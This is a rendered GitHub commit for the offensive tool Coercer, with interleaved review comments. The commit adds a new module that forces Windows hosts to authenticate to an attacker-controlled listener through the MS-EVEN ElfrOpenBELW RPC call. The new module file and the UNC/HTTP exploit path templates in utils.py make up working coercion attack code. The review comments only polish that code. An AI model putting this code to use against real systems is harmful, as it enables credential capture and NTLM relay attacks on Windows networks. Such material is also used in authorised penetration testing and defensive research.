Added MS-EVEN::ElfrOpenBELW (CheeseOunce)
Fixes #14
p0dalirius committed Dec 11, 2022
1 parent 2d8d616 commit a8fd037
Showing 10 changed files with 80 additions and 706 deletions.
1 change: 1 addition & 0 deletions Makefile
@@ -13,6 +13,7 @@ docs:
@echo "[$(shell date)] Done!"

install: build
python3 -m pip uninstall coercer
python3 setup.py install

build:
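Review bot: `python3 -m pip uninstall coercer` (the line that appears to be this hunk's addition) runs without `-y`, so `make install` stops at pip's interactive confirmation prompt and aborts in any non-interactive run (CI, a scripted install). Change it to `python3 -m pip uninstall -y coercer`. The rest of the `install` recipe and the `build` target are outside the hunk.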
3 changes: 2 additions & 1 deletion coercer/core/modes/coerce.py
@@ -117,7 +117,8 @@ def action_coerce(target, available_methods, options, credentials, reporter):
next_action_answer = None
while next_action_answer not in ["C","S","X"]:
next_action_answer = input("Continue (C) | Skip this function (S) | Stop exploitation (X) ? ")
next_action_answer = next_action_answer.strip()[0].upper()
if len(next_action_answer) > 0:
next_action_answer = next_action_answer.strip()[0].upper()
if next_action_answer == "C":
pass
elif next_action_answer == "S":
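Review bot: The new guard tests `len(next_action_answer) > 0` on the raw input but then indexes the stripped value, so whitespace-only input (a space followed by Enter) passes the guard and `strip()[0]` still raises IndexError, the very crash the guard was added to prevent for an empty line. Strip first and test the stripped value: `next_action_answer = next_action_answer.strip()` followed by `if next_action_answer: next_action_answer = next_action_answer[0].upper()`. With that order an empty or blank answer simply re-enters the `while` loop and re-prompts. The loop and `action_coerce` continue outside the hunk.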
7 changes: 6 additions & 1 deletion coercer/core/modes/fuzz.py
@@ -107,7 +107,12 @@ def action_fuzz(target, available_methods, options, credentials, reporter):
continue
if listener_type == "http":
http_listen_port = get_next_http_listener_port(current_value=http_listen_port, listen_ip=listening_ip, options=options)
exploitpath = generate_exploit_path_from_template(template=exploitpath, listener=listening_ip, port=http_listen_port)
exploitpath = generate_exploit_path_from_template(
template=exploitpath,
listener=listening_ip,
http_listen_port=http_listen_port,
smb_listen_port=options.smb_port
)

msprotocol_rpc_instance = msprotocol_class(path=exploitpath)
dcerpc = DCERPCSession(credentials=credentials, verbose=True)
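Review bot: The expanded call passes `options.smb_port` straight through as `smb_listen_port`, while the templates in coercer/core/utils.py place `{{smb_listen_port}}` immediately after `{{listener}}` with no separator, so a usable path depends on generate_exploit_path_from_template rendering its own separator (or nothing for the default port); that helper is outside this hunk, so confirm it does, otherwise the fuzzed SMB paths get a bare port number glued to the host name. A one-line comment at the call site such as `# both ports are passed; the helper substitutes whichever placeholder the template contains` would record the intent. Whether this call sits inside the `if listener_type == "http"` branch cannot be read from the rendered hunk because indentation was lost, and `action_fuzz` continues outside it.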
10 changes: 8 additions & 2 deletions coercer/core/utils.py
@@ -47,19 +47,25 @@ def generate_exploit_templates(desired_auth_type=None):
("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
# UNC path with ??
("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa\x00'),
("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
# UNC path with .
("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\x00'),

# HTTP
("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\File.txt\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}\\\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}\x00'),
("http", '\\\\{{listener}}{{http_listen_port}}\x00')
]

if add_uncommon_tests:
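Review bot: The new `'\\\\.\\UNC\\...'` group is a hand-copied variant of the `'\\??\\UNC\\...'` group above it with only the prefix changed, and the two already differ: the `??` group carries a `\\{{rnd(8)}}\\aa` entry that the `.` group lacks (the start of the `?` group is outside the hunk, so it cannot be compared). Generating all three groups from one suffix list with a loop over the prefixes would keep them in step; if the asymmetry is intended, a comment such as `# the \\aa variant is only needed for the \\??\\ prefix` beside that entry should say so. These templates are also NUL-terminated while the per-method `exploit_paths` in the new MS_EVEN module is not, and the `rstrip('\x00')` in its trigger absorbs both; that convention deserves a comment here. `generate_exploit_templates` starts and ends outside the hunk.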
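--- /dev/null
+++ b/coercer/methods/MS_EVEN/ElfrOpenBELW.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# File name : ElfrOpenBELW.py
+# Author : Podalirius (@podalirius_)
+# Date created : 11 Dec 2022
+
+
+from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
+from coercer.network.DCERPCSessionError import DCERPCSessionError
+from impacket.dcerpc.v5 import even
+from impacket.dcerpc.v5.dtypes import NULL
+
+
+class ElfrOpenBELW(MSPROTOCOLRPCCALL):
+"""
+Coercing a machine to authenticate using function [ElfrOpenBELW](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1) (opnum 9) of [MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f)
+Method found by:
+- [@evilashz](https://github.com/evilashz/)
+"""
+
+exploit_paths = [
+("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa')
+]
+
+access = {
+"ncan_np": [
+{
+"namedpipe": r"\PIPE\eventlog",
+"uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
+"version": "0.0"
+}
+]
+}
+
+protocol = {
+"longname": "[MS-EVEN]: EventLog Remoting Protocol",
+"shortname": "MS-EVEN"
+}
+
+function = {
+"name": "ElfrOpenBELW",
+"opnum": 9,
+"vulnerable_arguments": ["BackupFileName"]
+}
+
+def trigger(self, dcerpc_session, target):
+if dcerpc_session is not None:
+try:
+self.path = self.path.rstrip('\x00')
+request = even.ElfrOpenBELW()
+request['UNCServerName'] = NULL
+request['BackupFileName'] = self.path
+request['MajorVersion'] = 1
+request['MinorVersion'] = 1
+resp = dcerpc_session.request(request)
+resp.dump()
+return ""
+except Exception as err:
+return err
+else:
+print("[!] Error: dce is None, you must call connect() first.")
+return None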
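Review bot: `DCERPCSessionError` is imported but never referenced, while `trigger` catches a blanket `Exception` and returns the exception object, so a transport failure, an RPC fault from the server and a bug in building the request all come back to the caller as the same kind of value. Catching `DCERPCSessionError` first and letting anything else propagate, or at least logging it, would make failures diagnosable and justify the import. `trigger` also mixes return types (`""` on success, an exception instance on failure, `None` when no session) and `self.path = self.path.rstrip('\x00')` rewrites instance state on every call; a docstring on `trigger` stating the return contract and why the trailing NUL is stripped would help, presumably matching the convention of the other method classes, which are not visible here. Note that the rendered page lost the file's indentation, so the class and method bodies above appear flush left.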
File renamed without changes.
142 changes: 0 additions & 142 deletions coercer/protocols/MS_DFSNM.py

This file was deleted.
